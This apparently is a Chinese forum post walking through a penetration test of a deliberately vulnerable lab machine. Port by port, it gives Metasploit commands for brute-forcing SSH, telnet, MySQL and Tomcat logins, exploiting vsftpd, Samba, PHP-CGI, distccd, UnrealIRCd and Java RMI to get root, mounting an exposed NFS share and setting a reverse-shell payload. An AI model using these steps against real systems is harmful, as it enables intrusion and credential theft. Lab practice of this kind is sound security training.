偷了个懒,打开靶场看了一下IP地址192.168.3.204;
红色部分不会做,求大家指点。
打开Kali,运行MSF后search portscan,使用/tcp选线,set一下rhost,run;
可以看到得到的信息很少,使用nmap192.168.3.204 -p 1-10000 -A -O查询,然后对照着看;
接下来一个一个来:
1,Port:21,FTP,vsftpd2.3.4
search vsftpd;搜索一下这个服务
use 0;只有一个,使用
options;只有一个参数需要输入
set rhost 192.168.3.204;直接输入ip
run;之后id看到是root
总结:尽量不要使用ftp服务了,如果必须使用,密码规则一定要严格
2,Port:22,SSH,Openssh4.71
search ssh_login
use 0;是ssh_login不带pubkey的选项
options;看到有很多参数需要输入,而且其中用户名密码不是不选项
set rhost 192.168.3.204;直接输入
set pass_file /temp/1.txt;为了直接看效果,提前准备好的,也可以用kali中的
set user_file /temp/1.txt;如上
run;看到结果,用finalshell直接登陆
总结:变更端口和密码复杂度要求
3,Port:23,telnet,linuxtelnet
search telnet;
use 34;就是telnet_login选项
后面同上
总结:尽量不要使用ftp服务了,如果必须使用,密码规则一定要严格
4,Port:25,smtp,Postfix smtpd
search smtp;
use 25;用smtp_enum
options;
set rhosts192.168.3.204;
run;看到跑出一些账户,可以用其他工具在此暴力破解
总结:如果必须使用,密码规则一定要严格
5,Port:53,domain,IscBind9.4.2
这个没有头绪,先放着
6,Port:80,http,Apachehttpd2.2.8
浏览器输入192.168.3.204:80,看到有一些路径,其中有个靶场,还有phpmyadmin;
尝试一下phpinfo.php,访问成功,发现服务器加入了cgi,于是search php cgi;
use 8;php_cgi
options;
set rhost 192.168.3.204;
run;貌似进入目标服务器了
cat etc/passwd;可到用户,可以配合暴力破解
shell;打算msfvenom一个木马从靶机下载执行,或者配置CS一个木马试着再靶机上执行,这样看看效果来着,但是shell之后不能敲回车,暂时放置
总结:服务升级
7,Port:111/2049,rpcbind,rpc
看到这个端口,百度了一下是网络文件服务相关的,一般和2049端口配合使用,看了一下端口开放情况确实有此端口开放;
根据开启了rpcbind,安装NFS客户端来进行连接测试;
apt-get install nfs-common;安装客户端
showmount -e 192.168.3.204;发现根目录共享了
mkdir -p /temp/etc;本地建立映射文件夹
mount -t nfs 192.168.3.204:/etc /temp/etc;挂载到本地(也可以整个根目录挂载)
总结:特别注意服务器端的设置
8,Port:139/445,samba,samba3.x
search samba;看到这个,首先想到的是永恒之蓝139/445,但是看到描述有个命令执行的
use 8;执行这个试试看
options;
set rhost 192.168.3.204;
run;得到的是root权限
总结:还是注意打开防火墙吧
9,Port:512/513/514,exec,netkit-rsh
search rlogin;先查了一下这个端口的相关漏洞信息,Linux Rexec服务端口,对Rlogin登录可能存在爆破
use 3;爆破,设置用户密码文件,但是没有跑成功
总结:这块不太懂,没有查到能看懂的资料,在网上找到的直接得到sell的方法,没成功
10,Port:1009,java-rmi,GUN
search java rmi;远程命令执行
use 4;java_rmi_server这个选项
set rhost 192.168.3.204;
run;之后能得到shell,然后id看到root权限
11,Port:1524,bindshell,Metasploitable root shell
作为一只菜猫,看到这个端口比较迷糊,然后百度一下,看到是已有后门,直接使用telnet连接即可
12,Port:2121,ftp,Proftp
应该是爆破,没找到相关文章
13,Port:3306,mysql,Mysql5.0.51
search mysql;
use 17;爆破
set rhost 192.168.3.204;
set user_file /tmp/1.txt
set pass_file /tmp/1.txt
run;得到root:空秘密
14,Port:3632,distccd,distccd
search distccd;剩下的都差不多
总结:很多没有payload的我发现可以用set payload cmd/unix/reverse,不知道是不是我用错了,还是真的可以,求指点。
15,Port:5432,PG;postgreSQL
与上道题类似
16,Port:5900,VNC,VNC
与上道题类似
17,Port:6000,X11,无
不懂,百度结果:6000端口是在Linux系统中用于X Window系统的网络服务端口,还有一条(CVE-2020-8195)Citrix 未授权访问漏洞
总结:依旧没找到方法,网上的方法也无法操作
18,Port:6667/6697,irc,unrealircd
继续百度:IRC是Inter Relay chat的缩写,是网络上一种聊天的服务器。。。
search unrealircd;
set rhost 192.168.3.204;
set lhost 192.168.3.99;
run;root权限
19,Port:8009,ajp13,ApacheJserv
search Jserv;
set rhost 192.168.3.204;
run;只是导出一个文件,不知道有啥用,求指点。
20,Port:8180,http,ApacheTomcat
search tomcat login;还是暴力破解吧
set rhost 192.168.3.204;
set rport 8180;
run;看到tomcat:tomcat可以登陆
21,Port:8787,drb,Ruby drb rmi 1.8.0
search drb;然后,然后就没有然后了。。。
总结:这个不会,而且找到的资料验证失败了,求指点。